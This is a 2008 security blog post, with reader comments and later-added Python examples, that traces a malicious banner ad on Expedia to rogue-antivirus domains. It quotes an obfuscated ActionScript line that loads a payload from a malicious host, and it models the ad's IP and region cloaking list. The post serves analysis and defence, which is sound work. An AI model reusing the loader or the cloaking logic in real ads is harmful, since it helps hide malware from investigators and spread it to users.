Spyware Sucks
“There is no magic fairy dust protecting Macs" – Dai Zovi, author of “The Mac Hacker’s Handbook"

expedia.com hit by malicious banner advertisement?

January 28th 2008 in Uncategorized

Expedia.com has been infiltrated by a malicious banner advertisement – a new one that I have not seen before.

Victim site: Expedia.com (216.251.114.10)
SWF host: media.expedia.com
SWF Source:
Target fraudware domain: scanner2.malware-scan.com
Banned cities, countries and IPs:
  199.3.0.0-199.3.255.255
  216.251.0.0-216.251.255.255
  172.30.0.0-172.30.25.255 (note: expedia.com’s IP is banned)
  IN, IL, UK, AU, FR, IT, CN, JP, DE, ES, MX, AE
  colorado, washington, california, massachusetts, ontario, texas, hawaii, missouri, illinois
Permitted cities, countries and IPs:
SWF URL: media.expedia.com/ads/FXSound/728×90.swf
Special notes: Incident reported to expedia.com
Resolution:

Let’s have a look at the danger path:

URL / Referrer pairs, most recent request first:

URL: scanner2.malware-scan.com/18_swp/?tmn=null&aid=&lid=&affid=&ax=&ed=&aid=pygmalioni_ma18_mb1t&lid=728&affid=&ax=1&ed=2&mt_info=3958_0_1349
Referrer: prevedmarketing.com/?tmn=mwatmp&aid=mi1eroof&lid=728&ax=1&ed=2&mt_info=4957_3064_2358

URL: prevedmarketing.com//?tmn=mwatmp&aid=pygmalioni&lid=728&ax=1&ed=2&mt_info=5337_4168_2358
Referrer: blessedads.com/?cmpid=pygmalioni&adid=728

URL: quinquecahue.com/statss.php?campaign=pygmalioni&u=1200655836
Referrer: quinquecahue.com/swf/gnida.swf?campaign=pygmalioni&u=1200655836

URL: quinquecahue.com/swf/gnida.swf?campaign=pygmalioni&u=1200655836
Referrer: quinquecahue.com/statsg.php?u=1200655836&campaign=pygmalioni

URL: quinquecahue.com/statsa.php?u=1200655836&campaign=pygmalioni
Referrer: media.expedia.com/ads/FXSound/728×90.swf
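
Reading an ordered path out of a URL/Referrer table like the one above is error-prone by hand, so here is an added example (my code, not the post's) that does it mechanically: it links each row's referrer to the row that requested that URL, reports the hops the Referer headers do not explain (typically an HTTP redirect or a script-initiated load that sent no Referer), and lists the tracking tokens that recur across hosts. The rows are the ones from the danger path above; the http scheme is assumed because the post omits it, and the ad file name is written with an ASCII x.

```python
from urllib.parse import urlsplit, parse_qs

# URL / Referrer rows from the danger path above, most recent request first.
# The post gives no scheme; http is assumed (constructed detail).
PAIRS = [
    ("scanner2.malware-scan.com/18_swp/?tmn=null&aid=&lid=&affid=&ax=&ed=&aid=pygmalioni_ma18_mb1t&lid=728&affid=&ax=1&ed=2&mt_info=3958_0_1349",
     "prevedmarketing.com/?tmn=mwatmp&aid=mi1eroof&lid=728&ax=1&ed=2&mt_info=4957_3064_2358"),
    ("prevedmarketing.com//?tmn=mwatmp&aid=pygmalioni&lid=728&ax=1&ed=2&mt_info=5337_4168_2358",
     "blessedads.com/?cmpid=pygmalioni&adid=728"),
    ("quinquecahue.com/statss.php?campaign=pygmalioni&u=1200655836",
     "quinquecahue.com/swf/gnida.swf?campaign=pygmalioni&u=1200655836"),
    ("quinquecahue.com/swf/gnida.swf?campaign=pygmalioni&u=1200655836",
     "quinquecahue.com/statsg.php?u=1200655836&campaign=pygmalioni"),
    ("quinquecahue.com/statsa.php?u=1200655836&campaign=pygmalioni",
     "media.expedia.com/ads/FXSound/728x90.swf"),
]


def hostname(url):
    """Hostname of a URL that may lack a scheme."""
    if "://" not in url:
        url = "http://" + url
    return urlsplit(url).hostname


def build_segments(pairs):
    """Chain rows by matching each referrer to the row that requested it.

    Returns ordered segments, earliest first. A segment ends wherever its last
    URL is nobody's referrer, and a new one starts at a referrer that was never
    itself captured as a request; a referrer table alone rarely gives one
    unbroken path, so the gaps are reported separately by unexplained_hops().
    """
    successor = {ref: url for url, ref in pairs}
    requested = {url for url, _ in pairs}
    segments = []
    for _, ref in reversed(pairs):        # rows are newest first; walk oldest first
        if ref in requested:
            continue                      # has a predecessor, so not a segment start
        seg = [ref]
        while seg[-1] in successor and successor[seg[-1]] not in seg:  # cycle guard
            seg.append(successor[seg[-1]])
        segments.append(seg)
    return segments


def unexplained_hops(segments):
    """Boundaries between segments: transitions the Referer headers do not account for."""
    return [(segments[i][-1], segments[i + 1][0]) for i in range(len(segments) - 1)]


def domain_path(segments):
    """Distinct hosts in the order the victim's browser first touched them."""
    seen, path = set(), []
    for seg in segments:
        for url in seg:
            h = hostname(url)
            if h not in seen:
                seen.add(h)
                path.append(h)
    return path


def campaign_tokens(pairs):
    """Query values that appear on more than one host: the ids tying the hops together."""
    hosts_by_value = {}
    for url, ref in pairs:
        for u in (url, ref):
            query = urlsplit("http://" + u).query
            for key in ("campaign", "cmpid", "aid", "u"):
                for value in parse_qs(query).get(key, []):
                    hosts_by_value.setdefault(value, set()).add(hostname(u))
    return {v: sorted(h) for v, h in hosts_by_value.items() if len(h) > 1}


if __name__ == "__main__":
    segs = build_segments(PAIRS)
    for seg in segs:
        print(" -> ".join(seg))
    print("unexplained hops:", len(unexplained_hops(segs)))
    print("domain path:", " -> ".join(domain_path(segs)))
    print("shared tokens:", campaign_tokens(PAIRS))
```

For the rows above this yields four segments and three unexplained hops, which is the shape to expect from a referrer-only view: the redirect from the pygmalioni prevedmarketing URL to the mi1eroof one, for instance, leaves no Referer trail, so a full Fiddler or Ethereal capture (with response codes) is what turns these fragments into proof.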

So, let’s take a look at this new name, quinquecahue.com.


Not surprisingly, the malicious domain is hosted by, you guessed it, securehost.com (190.15.64.190):
http://www.robtex.com/dns/quinquecahue.com.html


Who else might we find in that IP range…
http://www.robtex.com/cnet/190.15.64.html


Again, no surprise, we see akamahi.net, newbieadguide.com, vozemiliogaranon.com and a name I have not seen before, familyislands.com.


Check out the domains sharing nameservers with quinquecahue.com – I *know* you’re going to recognise many names….


Domains sharing nameservers:
advancedcleaner.com
akamahi.net
antispywaresuite.com
antiviruspcsuite.com
antiworm2008.com
avsystemcare.com
bestsellerantivirus.com
diskretter.com
elmejorantivirus.com
erreurchasseur.com
exterminadordevirus.com
moncontenuassistant.com
schijfbewaker.com
securepccleaner.com
spyguardpro.com
storageprotector.com
systemdoctor.com
thetechnorati.com
toolsicuro.com
vozemiliogaranon.com
winspycontrol.com
yourprivacyguard.com

Subdomains:
*.quinquecahue.com
ns1.quinquecahue.com
ns2.quinquecahue.com
ns3.quinquecahue.com
ns4.quinquecahue.com


7 comments to “expedia.com hit by malicious banner advertisement?”

RBNexploit

This is another run as in November 07; there are a few more hosts involved in the triangulation, see http://rbnexploit.blogspot.com/2007/11/rbn-pc-hijacking-via-banner-ads-on.html



David Marsden

I got something similar from http://www.genesreunited.co.uk which attempted to download PerformanceOptimizer.



mike wood

Re: malicious banner advertisement. I too got hit from GenesReunited.co.uk with PerformanceOptimizer. As a naive computer user, do I need to let GR know about it? And how come their security didn’t pick it up??



David Marsden

Hi Mike,

I reported this to GR and they tried to fob me off by advising me that my account seemed to be ok and that I should run an anti-virus program. I replied that I didn’t even download the spyware and that I use linux as an operating system, but that plenty of their other users may be at risk and should be aware. I also gave them a link to this site.

GR appears to be down right now…



sandi

Hi guys,

The campaign on genesreunited has been coded to NOT display when the computer being used is in genesreunited’s IP range.

I need a Fiddler capture, Ethereal capture or other network trace – that will give me all the proof I need to get this shut down.

Sandi



Golan

Hi,

Sorry for the off-topic question, but how can you tell which are the banned IPs/cities/countries?

Thanks!



bago

It was a pretty clever attack, where from a neutral country they would contact the ad provider and provide them with highly obfuscated Flash. The Flash would then check the campaign’s blacklist so that if you were trying to figure out where these rogue ads came from you got a blank Flash file. Then it would download gnida.swf, which would then download the slowware that they advertised how to remove. The main problem is that Adobe lets you make a function call with an array reference, bypassing CAS.

// ActionScript 2 from the obfuscated ad SWF, as quoted by bago (string quotes restored).
// Every call goes through bracket notation, so "_url", "substr" and "loadMovie" are plain
// string data and a naive static scan for a loadMovie() call finds nothing. The && also
// means the load only fires when the SWF was served over http://, not opened locally.
_root["_url"]["substr"](0, 7) == "http://" && this.m1["loadMovie"]("newbieadguide.com/statsa.php" + "&u=" + somenumbers);

Each campaign had its own blacklist and region lockout.

Here was the IP blacklist:

62.193.227.221
62.193.235.245
62.193.235.46
64.233.183.104
66.102.9.104
66.249.91.104
69.46.17.170
72.14.209.104
72.14.235.104
72.14.253.104
209.85.135.104
062.193.227.222
066.232.118.93
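
The table at the top of the post (banned IP ranges, countries and regions for the Expedia campaign) and bago’s comment above (a per-campaign exact-IP blacklist) describe the same cloaking check, so here is one added example, my code rather than anything from the post or from bago, that models it in Python: a visitor is suppressed on any single match, and the victim site’s own address space is on the list, which is why staff at the victim (or an analyst on a banned network) see a clean ad while ordinary users get the payload. How the SWF geolocated a visitor is not on the page; the country and region are assumed here to be strings the caller already has. The country code "UK" is compared as written, since that is how the campaign’s own list spells it.

```python
import ipaddress

# Rules copied from the post's table and from bago's exact-IP list in the comments.
BANNED_RANGES = [
    "199.3.0.0-199.3.255.255",
    "216.251.0.0-216.251.255.255",   # contains expedia.com's own 216.251.114.10
    "172.30.0.0-172.30.25.255",
]
BANNED_COUNTRIES = {"IN", "IL", "UK", "AU", "FR", "IT", "CN", "JP", "DE", "ES", "MX", "AE"}
BANNED_REGIONS = {"colorado", "washington", "california", "massachusetts", "ontario",
                  "texas", "hawaii", "missouri", "illinois"}
BANNED_EXACT = [
    "62.193.227.221", "62.193.235.245", "62.193.235.46", "64.233.183.104",
    "66.102.9.104", "66.249.91.104", "69.46.17.170", "72.14.209.104",
    "72.14.235.104", "72.14.253.104", "209.85.135.104",
    "062.193.227.222", "066.232.118.93",   # zero-padded octets, exactly as bago listed them
]


def normalize_ip(text):
    """Strip zero-padding from dotted-quad octets.

    ipaddress.ip_address() rejects "062.193.227.222" because leading zeros are
    ambiguous (some C libraries read them as octal). The list also carries
    62.193.227.221, so decimal was clearly intended; normalizing rather than
    skipping keeps the model of the cloak from being more generous than the real one.
    """
    octets = text.strip().split(".")
    if len(octets) != 4:
        raise ValueError(f"not a dotted quad: {text!r}")
    return ".".join(str(int(o, 10)) for o in octets)


def parse_range(text):
    """'a.b.c.d-e.f.g.h' -> (low, high) as IPv4Address objects."""
    lo, hi = (ipaddress.ip_address(normalize_ip(p)) for p in text.split("-"))
    if lo > hi:
        raise ValueError(f"inverted range: {text}")
    return lo, hi


RANGES = [parse_range(r) for r in BANNED_RANGES]
EXACT = {ipaddress.ip_address(normalize_ip(ip)) for ip in BANNED_EXACT}


def suppression_reasons(ip, country=None, region=None):
    """Why the SWF would stay blank for this visitor; [] means the payload would run.

    Any single match suppresses. Country/region are caller-supplied strings
    (assumption of this example; the page does not say how the SWF looked them up).
    """
    addr = ipaddress.ip_address(normalize_ip(ip))
    reasons = []
    if any(lo <= addr <= hi for lo, hi in RANGES):
        reasons.append("ip-range")
    if addr in EXACT:
        reasons.append("ip-exact")
    if country and country.strip().upper() in BANNED_COUNTRIES:
        reasons.append("country")
    if region and region.strip().lower().replace(" ", "") in BANNED_REGIONS:
        reasons.append("region")
    return reasons


def victim_is_blinded(victim_ip="216.251.114.10"):
    """True when the victim site's own address sits inside the campaign's ban list."""
    return "ip-range" in suppression_reasons(victim_ip)


if __name__ == "__main__":
    for args in [("216.251.114.10",), ("062.193.227.222",), ("8.8.8.8", "UK"),
                 ("8.8.8.8", "US", "Texas"), ("8.8.8.8", "US", "Florida")]:
        print(args, "->", suppression_reasons(*args) or "payload shown")
    print("victim blinded:", victim_is_blinded())
```

The practical consequence is the one Sandi states in her reply above: a report from the site’s own staff, or a test from a banned network, proves nothing, so the evidence has to come from a capture taken by an affected user.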

